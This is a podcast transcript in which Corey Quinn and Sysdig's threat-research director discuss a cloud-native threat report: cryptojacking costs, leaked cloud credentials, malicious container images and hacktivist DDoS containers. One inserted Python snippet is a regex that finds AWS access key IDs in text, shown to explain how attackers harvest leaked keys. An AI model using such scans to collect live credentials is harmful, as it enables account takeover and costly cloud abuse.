Raising Awareness on Cloud-Native Threats with Michael Clark

Episode Summary

Corey is joined by Michael Clark, Director of Threat Research at Sysdig, to discuss the refreshingly non-salesy approach of the 2022 Sysdig Cloud-Native Threat Report. Corey and Michael discuss how cryptomining in your cloud environment is often perceived as more of a nuisance than the expensive threat it is, as well as other threats out there today and how to gauge the severity of a threat against more than just monetary cost. Michael also reveals how the team was put together to compile the report and why they intentionally moved away from packaging it as a thinly-veiled marketing tool and toward creating a report of substantive value.

Episode Show Notes & Transcript

About Michael

Michael is the Director of Threat Research at Sysdig, managing a team of experts tasked with discovering and defending against novel security threats. Michael has more than 20 years of industry experience in many different roles, including incident response, threat intelligence, offensive security research, and software development at companies like Rapid7, ThreatQuotient, and Mantech. Prior to joining Sysdig, Michael worked as a Gartner analyst, advising enterprise clients on security operations topics.



Links Referenced:

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.



Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Something interesting about this particular promoted guest episode that is brought to us by our friends at Sysdig is that when they reached out to set this up, one of the first things out of their mouth was, “We don’t want to sell anything,” which is novel. And I said, “Tell me more,” because I was also slightly skeptical. But based upon the conversations that I’ve had, and what I’ve seen, they were being honest. So, my guest today—surprising though it may be—is Mike Clark, Director of Threat Research at Sysdig. Mike, how are you doing?



Michael: I’m doing great. Thanks for having me. How are you doing?



Corey: Not dead yet. So, we take what we can get sometimes. You folks have just come out with the “2022 Sysdig Cloud-Native Threat Report”, which, on one hand, feels like kind of a wordy title; on the other, it actually encompasses everything that it is, and you need every single word of that report. At a very high level, what is that thing?



Michael: Sure. So, this is our first threat report we’ve ever done, and it’s kind of a rite of passage, I think, for any security company in the space; you have to have a threat report. And for the cloud-native part, Sysdig specializes in cloud and containers, so we really wanted to focus in on those areas when we were making this threat report, which talks about, you know, some of the common threats and attacks we were seeing over the past year, and we just wanted to let people know what they are and how to protect themselves.



Corey: One thing that I’ve found about a variety of threat reports is that they tend to excel at living in the fear, uncertainty, and doubt space. And invariably, they paint a very dire picture of the internet about to come cascading down. And then at the end, there’s always a, “But there is hope. Click here to set up a meeting with us.” It’s basically a very thinly-veiled cover around what is fundamentally a fear, uncertainty, and doubt-driven marketing strategy, and then it tries to turn into a sales pitch.



This does absolutely none of that. So, I have to ask: did you set out to intentionally make something that added value in that way and contributed to the body of knowledge, or is it that, because it’s your inaugural report, you didn’t realize you were supposed to turn it into a terrible sales pitch?



Michael: We definitely went into that on purpose. There’s a lot of ways to fix things, especially these days with all the different technologies, so we can easily talk about the solutions without going into specific products. And that’s kind of the way we went about it. There’s a lot of ways to fix each of the things we mentioned in the report. And hopefully, the person reading it finds a good way to do it.



Corey: I’d like to unpack a fair bit of what’s in the report. And let’s be clear, I don’t intend to read this report into a microphone; that is generally not a great way of conveying information that I have found. But I want to highlight a few things that leapt out to me that I find interesting. Before I do that, I’m curious to know, most people who write reports, especially ones of this quality, are not sitting there cogitating in their office by themselves, and they set pen to paper and emerge four days later with the finished treatise. There’s a team involved, there’s more than one person that weighs in. Who was behind this?



Michael: Yeah, it was a pretty big team effort across several departments. But mostly, it came down to the Sysdig threat research team. It’s about ten people right now. It’s grown quite a bit through the past year. And, you know, it’s made up of all sorts of backgrounds and expertise.



So, we have machine learning people, data scientists, data engineers, former pen-testers and red team, a lot of blue team people, people from the NSA, people from other government agencies as well. And we’re also a global research team, so we have people in Europe and North America working on all of this. So, we try to get perspectives on how these threats are viewed by multiple areas, not just Silicon Valley, and express fixes that appeal to them, too.



Corey: Your executive summary on this report starts off with a cloud adversary analysis of TeamTNT. And my initial throwaway joke on that was going to be, “Oh, when you start off talking about any entity that isn’t you folks, they must have gotten the platinum sponsorship package.” But then I read the rest of that paragraph and I realized that, wait a minute, this is actually interesting and germane to something that I see an awful lot. Specifically, they are—and please correct me if I’m wrong on any of this; you are definitionally the expert whereas I am, obviously, the peanut gallery—but you talk about TeamTNT as being a threat actor that focuses on targeting the cloud via cryptojacking, which is a fanciful word for, “Okay, I’ve gotten access to your cloud environment; what am I going to do with it? Mine Bitcoin and other various cryptocurrencies.” Is that generally accurate or have I missed the boat somewhere fierce on that? Which is entirely possible.



Michael: That’s pretty accurate. We also think it’s just one person, actually, and they are very prolific. So, it was pretty hard to get them that platinum sponsorship package because they are everywhere. And even though it’s one person, they can do a lot of damage; especially with all the automation people can make now, one person can appear like a dozen.



Corey: There was an old t-shirt that basically encompassed everything that was wrong with the culture of the sysadmin world back in the aughts, that said, “Go away, or I will replace you with a very small shell script.” But, on some level, you can get a surprising amount of work done on computers just with things like for loops and whatnot. What I found interesting was that you have put numbers and data behind something that I’ve always taken for granted and just implicitly assumed that everyone knew. This is a common failure mode that we all have. We all have blind spots where we assume the things that we spend our time on are easy, and the stuff that other people are good at and you’re not good at, those are the hard things.



It has always been intuitively obvious to me as a cloud economist that when you wind up spending $10,000 in cloud resources to mine cryptocurrency, it does not generate $10,000 of cryptocurrency on the other end. In fact, the line I’ve been using for years is that it’s totally economical to mine Bitcoin in the cloud; the only trick is you have to do it in someone else’s account. And you’ve taken that joke and turned it into data. Something that you found was that in one case, you were able to attribute $8,100 of cryptocurrency that was generated by stealing $430,000 of cloud resources to do it. And oh, my God, we now have a number and a ratio, and I can talk intelligently and sound four times smarter. So, ignoring anything else in this entire report, congratulations, you have successfully turned this into what is beginning to become a talking point of mine. Value unlocked. Good work. Tell me more.



Michael: Oh, thank you. Cryptomining is kind of like viruses in the old on-prem environment. Normally, it’s just cleaned up and never thought of again; the antivirus software does its thing, life goes on. And I think cryptominers are kind of treated like that. Oh, there’s a miner; let’s rebuild the instance or bring a new container online or something like that.



So, it’s often considered a nuisance rather than a serious threat. It also doesn’t have the, you know, the dangerous ransomware connotation to it. So, a lot of people generally just think of it as a nuisance, as I said. So, what we wanted to show was, it’s not really a nuisance, and it can cost you a lot of money if you don’t take it seriously. And what we found was, for every dollar that they make, it costs you $53. And, you know, as you mentioned, it really puts into view what it could cost you by not taking it seriously. And that number can scale very quickly, just like your cloud environment can scale very quickly.
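That ratio can be sanity-checked with back-of-the-envelope arithmetic. The sketch below uses the two figures cited in this conversation ($430,000 in stolen cloud resources yielding roughly $8,100 of cryptocurrency); nothing else here comes from the report itself.

```python
# Back-of-the-envelope check on the cryptojacking economics discussed above:
# how many dollars the victim pays for each dollar the attacker earns.

def victim_cost_per_attacker_dollar(victim_cost: float, attacker_revenue: float) -> float:
    """Return the victim's spend per dollar of attacker revenue."""
    return victim_cost / attacker_revenue

# Figures cited in the conversation: $430,000 of stolen cloud resources
# produced about $8,100 of cryptocurrency.
ratio = victim_cost_per_attacker_dollar(430_000, 8_100)
print(f"The victim pays about ${ratio:.0f} for every $1 the attacker makes")
```

Dividing the two cited figures lands at roughly $53 of victim cost per attacker dollar, which matches the ratio Michael quotes.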



Corey: They say this cloud scales infinitely and that is not true. First, tried it; didn’t work. Secondly, it scales, but there is an inherent limit, which is your budget, on some level. I promise they can add hard drives to S3 faster than you can stuff data into it. I’ve checked.



One thing that I’ve seen recently was—speaking of S3—I had someone reach out in what I will charitably refer to as a blind panic because they were using AWS to do something. Their bill was largely $4 a month in S3 charges. Very reasonable. That carries us surprisingly far. And then they had a credential leak and they had a threat actor spin up all the Lambda functions in all of the regions, and it went from $4 a month to $60,000 a day and it wasn’t caught for six days.



And then AWS, as they tend to do, very straight-faced, says, “Yeah, we would like our $360,000, please.” At which point, people start panicking because a lot of the people who experience this are not themselves sophisticated customers; they’re students, they’re learning how this stuff works. And when I’m paying $4 a month for something, it is logical and intuitive for me to think that, well, if I wind up being sloppy with their credentials, they could run that bill up to possibly $25 a month and that wouldn’t be great, so I should keep an eye on it. Yeah, you dropped a whole bunch of zeros off the end of that. Here you go. And as AWS spins up more and more regions and as they spin up more and more services, the ability to exploit this becomes greater and greater. This problem is not getting better, it is only getting worse, by a lot.



Michael: Oh, yeah, absolutely. And I feel really bad for those students who do have that happen to them. I’ve heard on occasion that the cloud providers will forgive some debts from breaches, but there’s no guarantee of that happening. And you know, the more that breaches happen, the less likely they are to forgive it because they still have to pay for it; someone’s paying for it in the end. And if you don’t improve and fix your environment and it keeps happening, one day, they’re just going to stick you with the bill.



Corey: To my understanding, they’ve always done the right thing when I’ve highlighted something to them. I don’t have intimate visibility into it and of course, they have a threat model themselves of, okay, I’m going to spin up a bunch of stuff, mine cryptocurrency for a month—cry and scream and pretend I got hacked because fraud is very much a thing, there is a financial incentive attached to this—and they mostly seem to get it right. But the danger that I see for the cloud provider is not that they’re going to stop being nice and giving money away, but assume you’re a student who just winds up getting more than your entire college tuition as a surprise bill for this month from a cloud provider. Even assuming at the end of that everything gets wiped and you don’t owe anything. I don’t know about you, but I’ve never used that cloud provider again because I’ve just gotten a firsthand lesson in exactly what those risks are, it’s bad for the brand.



Michael: Yeah, it really does scare people off of that. Now, some cloud providers try to offer more proactive protections against this, try to shut down instances really quick. And you know, you can take advantage of limits and other things, but they don’t make that really easy to do. And setting those up is critical for everybody.
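The limits Michael mentions can be approximated today with AWS Budgets alerts. As a hedged sketch, the helper below builds the request payload for the AWS Budgets `CreateBudget` API; the budget name, dollar amount, threshold, and email address are all placeholder values, and actually creating the budget requires your own account ID and credentials.

```python
# Minimal sketch of a spend guardrail: an AWS Budgets alert that emails you
# when actual monthly cost crosses a percentage of a fixed limit.

def build_cost_budget(name: str, limit_usd: float, email: str) -> dict:
    """Build the keyword arguments for the AWS Budgets CreateBudget call."""
    return {
        "Budget": {
            "BudgetName": name,
            "BudgetLimit": {"Amount": str(limit_usd), "Unit": "USD"},
            "TimeUnit": "MONTHLY",
            "BudgetType": "COST",
        },
        "NotificationsWithSubscribers": [
            {
                "Notification": {
                    "NotificationType": "ACTUAL",
                    "ComparisonOperator": "GREATER_THAN",
                    "Threshold": 80.0,  # alert at 80% of the limit
                    "ThresholdType": "PERCENTAGE",
                },
                "Subscribers": [
                    {"SubscriptionType": "EMAIL", "Address": email},
                ],
            }
        ],
    }

payload = build_cost_budget("monthly-guardrail", 25.0, "student@example.com")
# To actually create it (requires credentials and your 12-digit account ID):
# import boto3
# boto3.client("budgets").create_budget(AccountId="123456789012", **payload)
```

Note that a budget alert only notifies; it does not stop spend on its own, which is part of why Michael says these protections "don't make that really easy to do."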



Corey: The one cloud provider that I’ve seen get this right, of all things, has been Oracle Cloud, where they have an always free tier. Until you affirmatively upgrade your account to chargeable, they will not charge you a penny. And I have experimented with this extensively, and they’re right, they will not charge you a penny. They do have warnings plastered on the site, as they should, that until you upgrade your account, do understand that if you exceed a threshold, we will stop serving traffic, we will stop servicing your workload. And yeah, for a student learner, that’s absolutely what I want. For a big enterprise gearing up for a giant Super Bowl commercial or whatnot, it’s, “Yeah, don’t care what it costs, just make sure you continue serving traffic. We don’t get a redo on this.” And without understanding exactly which profile a given customer falls into, whenever the cloud provider tries to make an assumption and a default in either direction, they’re wrong.



Michael: Yeah, I’m surprised it’s Oracle Cloud, of all clouds. It’s good to hear that they actually have a free tier. Now, we’ve seen attackers use free tiers quite a bit. It all depends on how people set it up. And it’s actually a little outside the threat report, but with CI/CD pipelines in DevOps, anywhere there’s free compute, attackers will try to get their miners in, because it’s all about scale and not quality.



Corey: Well, that is something I’d be curious to know. Because you talk about focusing specifically on cloud and containers as a company, which puts you in a position to be authoritative on this. That Lambda story that I mentioned, about the surprise $60,000 a day in cryptomining: what struck me about that and caught me by surprise was not what I think would catch most people who don’t swim in this world by surprise, namely, “You can spend that much?” In my case, what I’m wondering about is, well, hang on a minute. I did an article a year or two ago, “17 Ways to Run Containers On AWS”, and listed 17 AWS services that you could use to run containers.



And a few months later, I wrote another article called “17 More Ways to Run Containers On AWS.” And people thought I was belaboring the point and making a silly joke, and on some level, of course I was. But I was also highlighting very clearly that every one of those containers running in a service could be mining cryptocurrency. So, if you get access to someone else’s AWS account, when you see those breaches happen, are people using just the one or two services they have things ready to go for, or are they proliferating as many containers as they can through every service that borderline supports it?



Michael: From what we’ve seen, they usually just go after compute, like EC2, for example, as it’s the most well understood; it gets the job done, it’s very easy to use, and then they get their miner set up. So, if they happen to compromise your credentials (versus the other method cryptominers or cryptojackers use, which is exploitation), then they’ll try to spread throughout all the EC2 they can and spin up as much as they can. But the other interesting thing is, if they get into your system, maybe via an exploit or some other misconfiguration, they’ll look for the instance metadata service as soon as they get in, to try to get your IAM credentials and see if they can leverage them to also spin up things through the API. So, they’ll spin up on the thing they compromised and then actively look for other ways to get even more.
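The metadata-service step Michael describes is a single HTTP request. As a hedged sketch (the role name is a placeholder, and the fetch only works from inside an EC2 instance with IMDSv1 enabled), this shows what the attacker pulls and, in the comments, one common mitigation:

```python
# Sketch of the EC2 instance-metadata credential grab. Under IMDSv1, one
# unauthenticated GET from a compromised instance returns the attached
# role's temporary credentials.
import urllib.request

IMDS_BASE = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def credentials_url(role_name: str) -> str:
    """URL an attacker fetches to pull the role's temporary credentials."""
    return IMDS_BASE + role_name

def fetch_credentials(role_name: str) -> str:
    """Only works from inside an EC2 instance with IMDSv1 enabled."""
    with urllib.request.urlopen(credentials_url(role_name), timeout=2) as resp:
        return resp.read().decode()

# Mitigation sketch: require IMDSv2 session tokens, e.g. via the AWS CLI:
#   aws ec2 modify-instance-metadata-options \
#       --instance-id <your-instance-id> --http-tokens required
# With tokens required, the bare GET above is rejected.
```

Requiring IMDSv2 (and scoping the instance role's permissions tightly) blunts exactly the "spin up more through the API" escalation described above.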



Corey: Restricting the permissions that anything has in your cloud environment is important. I mean, from my perspective, if I were to have my account breached, yes, they’re going to cost me a giant pile of money, but I know the magic incantations to say to AWS and worst case, everyone has a pet or something they don’t want to see unfortunate things happen to, so they’ll waive my fee; that’s fine. The bigger concern I’ve got—in seriousness—I think most companies do is the data. It is the access to things in the account. In my case, I have a number of my clients’ AWS bills, given that that is what they pay me to work on.



And I’m not trying to undersell the value of security here, but on the plus side, that helps me sleep at night; that’s only money. There are datasets that are far more damaging and valuable than that. The worst sleep I ever had in my career came during a very brief stint I had about 12 years ago when I was the director of TechOps at Grindr, the gay dating site. In that scenario, if that data had been breached, people could very well have died. They live in countries where that winds up not being something that is allowed, or their family now winds up shunning them, and whatnot. And that’s the stuff that keeps me up at night. Compared to that, it’s, “Well, you cost us some money and embarrassed a company.” It doesn’t really rank on the same scale to me.



Michael: Yeah. I guess the interesting part is, data requires a lot of work to do something with for a lot of attackers. Like, they may be opportunistic and come across interesting data, but they need to do something with it; there’s a lot more risk once they start trying to sell the data, or, like you said, if it turns into something very unfortunate, then there’s a lot more risk from law enforcement coming after them. Whereas with cryptomining, there’s very little risk of being chased down by the authorities. Like you said, people rebuild things and ask AWS, or whoever, for credit, and move on with their lives. So, that’s one reason I think cryptomining is so popular among threat actors right now. It’s just the low risk compared to other ways of doing things.



Corey: It feels like it’s a nuisance. One thing that I was dreading when I got this copy of the report was that there was going to be what I see so often, which is, let’s talk about ransomware in the cloud, where people talk about encrypting data in S3 buckets and sneakily polluting the backups that go into different accounts, and how you’re air-gapping and the rest. And I don’t see that in the wild. I see that in the fear-driven marketing from companies that have a thing that they say will fix that, but in practice, when you hear about ransomware attacks, it’s much more frequently that it is their corporate network, it is on-premises environments, it is servers, perhaps running in AWS, but they’re being treated like servers would be on-prem, and that is what winds up getting encrypted. I just don’t see the attacks that everyone is warning about. But again, I am not primarily in the security space. What do you see in that area?



Michael: You’re absolutely right. Like we don’t see that at all, either. It’s certainly theoretically possible and it may have happened, but there just doesn’t seem to be that appetite to do that. Now, the reasoning? I’m not a hundred percent sure why, but I think it’s easier to make money with cryptomining, even with the crypto markets the way they are. It’s essentially free money, no expenses on your part.



So, maybe they’re not looking because, again, that requires more effort to understand what data is important, especially if it’s not targeted. And then it’s not exactly the same method to do the attack. There’s versioning, there are all these other hoops you have to jump through to do an extortion attack with buckets and things like that.



Corey: Oh, it’s high risk and feels dirty, too. Whereas if you’re just, I guess, on some level, psychologically, if you’re just going to spin up a bunch of coin mining somewhere and then some company finds it and turns it off, whatever. You’re not, as in some cases, shaking down a children’s hospital. Like, that’s one of those great, I can’t imagine how you deal with that as a human being, but I guess it takes all types. This does get us to sort of the second tentpole of the report that you’ve put together, specifically around the idea of supply chain attacks against containers. There have been such a tremendous number of think pieces—thought pieces, whatever they’re called these days—talking about a software bill of materials and supply chain threats. Break it down for me. What are you seeing?



Michael: Sure. So, containers are very fun because, you know, you can define things as code about what gets put on it, and they become so popular that sharing sites have popped up, like Docker Hub and other public registries, where you can easily share your container, it has everything built, set up, so other people can use it. But you know, attackers have kind of taken notice of this, too. Where anything’s easy, an attacker will be. So, we’ve seen a lot of malicious containers be uploaded to these systems.



A lot of times, they’re just hoping for a developer or user to come along and use them. Because Docker Hub does have the official designation, while they can try to pretend to be, like, Ubuntu, they won’t be the official one. But instead, they may try to seed theirs in links and things like that to entice people to use theirs instead. And then when they do, it’s already pre-loaded with a miner or, you know, other malware. So, we see quite a bit of these containers in Docker Hub. And they’re disguised as many different popular packages.



They don’t stand up to too much scrutiny, but enough that, you know, a casual look, even at the Dockerfile, may not catch it. So yeah, we see a lot of that. And embedded credentials are another big part of what we see in these containers. That could be an organizational issue, like just a leaked credential, but you can put malicious credentials into Dockerfiles, too, like, say, an SSH private key that, you know, if they start this up, the attacker can now just SSH in. Or other API keys, or commands that change your AWS account. You can put really anything in there, and wherever you load it, it’s going to run. So, you have to be really careful.



[midroll 00:22:15]



Corey: Years ago, I gave a talk on the conference circuit called “Terrible Ideas in Git” that purported to teach people how to use Git through hilarious examples of misadventure. And the demos that I did for it were fun and great, but it was really annoying resetting them every time I gave the talk, so I stuffed them all into a Docker image and then pushed that up to Docker Hub. Great. It was awesome. I didn’t publicize it and talk about it, but I also just left it as an open repository there because what are you going to do? It’s just a few directories in the root that have very specific contrived scenarios with Git, set up and ready to go.



There’s nothing sensitive there. And the thing is called, “Terrible Ideas.” And I just kept watching the download numbers continue to increment week over week, and I took it down because I don’t know what people are going to do with that. Like, you see something on there and it says, “Terrible Ideas.” For all I know, some bank is like, “And that’s what we’re running in production now.” So, who knows?



But the idea of—not that there was necessarily anything wrong with that, but the fact that there’s this theoretical possibility someone could use that, or put the wrong string in if I give an example, and then wind up running something that is fairly compromisable in a serious environment, was just something I didn’t want to be a part of. And you see that again, and again, and again. This idea of what Docker unlocks is amazing, but there’s such a tremendous risk to it. I mean, I never understood, 15 years ago, how you were going to go and spin up a Linux server on top of EC2 and just grab a community AMI and use that. It’s, yeah, I used to take provisioning hardware very seriously to make sure that I wasn’t inadvertently using something compromised. Here, it’s, “Oh, just grab whatever seems plausible from the catalog and go ahead and run that.” But it feels like there’s so much of that, turtles all the way down.



Michael: Yeah. And I mean, even if you’ve looked at the Dockerfile, with all the dependencies of the things you download, it really gets to be difficult. So, I mean, to protect yourself, you can do the static scanning of it, looking for bad strings in it or bad version numbers for vulnerabilities, but it really comes down to runtime analysis. So, when you start a Docker container, you really need the tools to have visibility into what’s going on in the container. That’s the only real way to know if it’s safe or not in the end, because you can’t eyeball it and really see all that, and there could be binaries in an assortment of layers, too, that’ll get run, and things like that.
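As a toy illustration of the static-scanning step Michael mentions: the sketch below greps a Dockerfile's text for a few strings that commonly indicate embedded secrets or miner setup. The patterns and the sample Dockerfile are purely illustrative; real scanners such as Trivy or Grype go much further, and, as Michael says, runtime visibility is still needed for anything a text scan can't see.

```python
# Toy static scan of Dockerfile text for suspicious strings.
import re

SUSPICIOUS_PATTERNS = [
    r"BEGIN (RSA|OPENSSH) PRIVATE KEY",  # embedded SSH private key
    r"AKIA[0-9A-Z]{16}",                 # AWS access key ID format
    r"xmrig|minerd|stratum\+tcp",        # common miner binaries/protocols
]

def scan_dockerfile(text: str) -> list[str]:
    """Return the patterns that match anywhere in the Dockerfile text."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, text)]

# Illustrative malicious Dockerfile: pulls and runs a miner binary.
dockerfile = """
FROM ubuntu:22.04
RUN curl -o /usr/bin/xmrig https://example.com/payload && chmod +x /usr/bin/xmrig
"""
print(scan_dockerfile(dockerfile))
```

The point of the toy is the limitation: a scan like this only catches what is literally visible in the text, which is why layers and runtime behavior matter.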



Corey: Hell is other people’s workflows, as I’m sure everyone’s experienced themselves, but one of mine has always been that if I’m doing something as a proof of concept to build it up on a developer box—and I do keep my developer environments for these sorts of things isolated—I will absolutely go and grab something that is plausible-looking from Docker Hub as I go down that process. But when it comes time to wind up putting it into a production environment, okay, now we’re going to build our own resources. Yeah, I’m sure the Postgres container or whatever it is that you’re using is probably fine, but just so I can sleep at night, I’m going to take the public Dockerfile they have, and I’m going to go ahead and build that myself. And I feel better about doing that rather than trusting some rando user out there and whatever it is that they’ve put up there. Which, on the one hand, feels like a somewhat responsible thing to do, but on the other, it feels like I’m only fooling myself because some rando putting things up there is kind of what the entire open-source world is, to a point.



Michael: Yeah, that’s very true. At some point, you have to trust some product or some foundation to have done the right thing. But what’s also true about containers is that they’re not just attacked; they’re also used to conduct attacks quite a bit. And we saw a lot of that with the Russian-Ukrainian conflict this year. Containers were released that were preloaded with denial-of-service software that automatically collected target lists from, I think, GitHub, where they were hosted.



So, all a user had to do to get involved was really just get the container and run it. That’s it. And now they’re participating in this cyberwar kind of activity. And they could also use this to build a botnet, or if they compromise an organization, they could spin up all these instances with that Docker container on them. And now that company is implicated in that cyberwar. So, they can also be used for evil.



Corey: This gets to the third point of your report: “Geopolitical conflict influences attacker behaviors.” Something that happened in the early days of the Russian invasion was that a bunch of open-source maintainers would wind up either disabling what their software did or subverting it into something actively harmful if it detected it was running in the Russian language and/or in a Russian timezone. And I understand the desire to do that, truly I do. I am no Russian apologist. Let’s be clear.



But the counterpoint to that as well is that, well, to make a reference I made earlier, Russia has children’s hospitals, too, and you don’t necessarily know the impact of fallout like that, not to mention that you have completely made it untenable to use anything you’re doing for a regulated industry or anyone else who gets caught in that and discovers that it is now in their production environment. It really sets a lot of stuff back. I’ve never been a believer in that particular form of vigilantism, for lack of a better term. I’m not sure that I have a better answer, let’s be clear. I just always knew that, on some level, the risks of opening that Pandora’s box were significant.



Michael: Yeah. Even if you’re doing it for the right reasons. It still erodes trust.



Corey: Yeah.



Michael: It especially erodes trust throughout open-source. Like, not just in the one project, because you’ll start thinking, “Oh, how many other projects might do this?” And—



Corey: Wait, maybe those dirty hippies did something in our—like, I don’t know, they’ve let those people anywhere near this operating system Linux thing that we use? I don’t think they would have done that. Red Hat seems trustworthy and reliable. And it’s yo, [laugh] someone needs to crack open a history book, on some level. It’s a sticky situation.



I do want to call out something here that it might be easy to get the wrong idea from the summary that we just gave. Very few things wind up raising my hackles quite like companies using tragedy to wind up shilling whatever it is they’re trying to sell. And I’ll admit when I first got this report, and I saw, “Oh, you’re talking about geopolitical conflict, great.” I’m not super proud of this, but I was prepared to read you the riot act, more or less when I inevitably got to that. And I never did. Nothing in this entire report even hints in that direction.



Michael: Was it you never got to it, or, uh—



Corey: Oh, no. I’ve read the whole thing, let’s be clear. You’re not using that to sell things in the way that I was afraid you were. And simultaneously I want to say—I want to just point that out because that is laudable. At the same time, I am deeply and bitterly resentful that that even is laudable. That should be the common state.



Capitalizing on tragedy is just not something that ever leaves any customer feeling good about one of their vendors, and you’ve stayed away from that. I just want to call that out is doing the right thing.



Michael: Thank you. Yeah, it was actually a big topic, how we should broach this. But we have a good data point: right after it started, there was a huge spike in denial-of-service installs. We have a bunch of data-collection technology, honeypots and other things, and we saw, the day after, cryptomining installs started going down and denial-of-service installs started going up. So, it was just interesting how that community changed its behaviors, at least for a time, to participate in, whatever you want to call it, the hacktivism.



Over time, though, it kind of has gone back to the norm where maybe they’ve gotten bored or something or, you know, run out of funds, but they’re starting cryptomining again. But these events can cause big changes in the hacktivism community. And like I mentioned, it’s very easy to get involved. We saw over 150,000 downloads of those pre-canned denial-of-service containers, so it’s definitely something that a lot of people participated in.



Corey: It’s a truism that war drives innovation and different ways of thinking about things. It’s a driver of progress, which says something deeply troubling about us. But it’s also clear that it serves as a driver for change, even in this space, where we start to see different applications of things, we see different threat patterns start to emerge. And one thing I do want to call out here that I think often gets overlooked in the larger ecosystem and industry as a whole is, “Well, no one’s going to bother to hack my nonsense. I don’t have anything interesting for them to look at.”



And on some level, an awful lot of the people running tools like this aren’t sophisticated enough to make that determination themselves. Combine that with your first point in the report: well, you have an AWS account, don’t you? Congratulations. You suddenly have enormous piles of money—from their perspective—sitting there relatively unguarded. Yay. Security has now become everyone’s problem, once again.



Michael: Right. And it’s just easier now. I mean, it was always everyone’s problem, but now it’s even easier for attackers to leverage almost everybody. Before, you had to get something onto your PC; you had to download something. Now, a search of GitHub can find API keys, and then that’s it, you know? Things like that make it game over: your account gets compromised and big bills get run up. And yeah, it’s very easy for all that to happen.
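The GitHub-search attack Michael describes boils down to pattern-matching leaked credentials in public text. As a rough illustration—this is a minimal sketch, not Sysdig tooling, and the regex covers only the well-known AWS access key ID prefixes—a scanner can look something like this:

```python
import re

# AWS access key IDs are 20 uppercase alphanumeric characters beginning
# with a documented prefix such as "AKIA" (long-term) or "ASIA" (temporary).
AWS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")


def find_candidate_keys(text: str) -> list[str]:
    """Return substrings that look like AWS access key IDs."""
    return [m.group(0) for m in AWS_KEY_RE.finditer(text)]


# AWS's own documentation uses this example key ID, so it is safe to print.
sample = 'config = {"aws_access_key_id": "AKIAIOSFODNN7EXAMPLE"}'
print(find_candidate_keys(sample))  # ['AKIAIOSFODNN7EXAMPLE']
```

Attackers run scans like this continuously against public commits, which is why a key pushed to GitHub can be abused within minutes of the push.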



Corey: Ugh. I do want to ask at some point, and I know you asked me not to do it, but I’m going to do it anyway because I have this sneaking suspicion that given that you’ve spent this much time on studying this problem space, that you probably, as a company, have some answers around how to address the pain that lives in these problems. What exactly, at a high level, is it that Sysdig does? Like, how would you describe that in an elevator without sabotaging the elevator for 45 minutes to explain it in depth to someone?



Michael: So, I would describe it as threat detection and response for cloud containers and workloads in general. And all the other kind of acronyms for cloud, like CSPM, CIEM.



Corey: They’re inventing new and exciting acronyms all the time. And honestly, at this point, I want to have almost an acronym challenge of, “Is this a cybersecurity acronym or is it an audio cable? Which is it?” Because it winds up going down that path super easily. I was at RSA walking the expo floor, and I counted, I think, 15 different companies pitching XDR, without a single one bothering to explain what that meant. Okay, I guess it’s just the thing we’ve all decided we need. It feels like security people selling to security people, on some level.



Michael: I was a Gartner analyst.



Corey: Yeah. Oh… that would do it then. Terrific. So, it’s partially your fault, then?



Michael: No. I was going to say, I don’t know what it means either.



Corey: Yeah.



Michael: So, I have no idea [laugh]. I couldn’t tell you.



Corey: I’m only half kidding when I say that, in many cases, from the vendor perspective, it seems like what it means is whatever gap the thing they built happens to fill. It’s kind of like observability: observability means what we’ve been doing for ten years already, just repurposed to catch the next hype wave.



Michael: Yeah. The only one I really understand is detection and response—it’s very clear: detect things and respond to things. So, that’s a lot of what we do.



Corey: It’s got to beat the default detection mechanism for an awful lot of companies, who in years past have found out that they’d been breached from a headline in The New York Times. It’s always fun when that happens: “Wait, what? What? That’s u—what? How did we not know this was coming?”



When a third party tells you that you’ve been breached, it’s never as positive—not that it’s a positive experience anyway—as discovering it yourself internally. And this stuff is complicated, the entire space is fraught, and it always feels like no matter how far you go, you could always go further; but taken to its inevitable conclusion, you’ll burn through the entire company budget purely on security without advancing the other things the company does.



Michael: Yeah.



Corey: It’s a balance.



Michael: It’s tough because there’s a lot to know in the security discipline, so you have to balance how much you’re spending against how much your people actually know and can use the things you’ve spent money on.



Corey: I really want to thank you for taking the time to go through the findings of the report for me. I had skimmed it before we spoke, but talking to you about this in significantly more depth, every time I start going to cite something from it, I find myself coming away more impressed. This is now actively going on my calendar to see what the 2023 version looks like. Congratulations, you’ve gotten me hooked. If people want to download a copy of the report for themselves, where should they go to do that?



Michael: They can just go to sysdig.com/threatreport. And thank you for having me. It was a lot of fun.



Corey: No, thank you for coming. Thanks for taking so much time to go through this, and thanks for keeping it to the high road, which I did not expect to discover because no one ever seems to. Thanks again for your time. I really appreciate it.



Michael: Thanks. Have a great day.



Corey: Mike Clark, Director of Threat Research at Sysdig. I’m Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you’ve enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you’ve hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment pointing out that I didn’t disclose the biggest security risk of all to your AWS bill: an AWS Solutions Architect who is working on commission.



Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.



Announcer: This has been a HumblePod production. Stay humble.



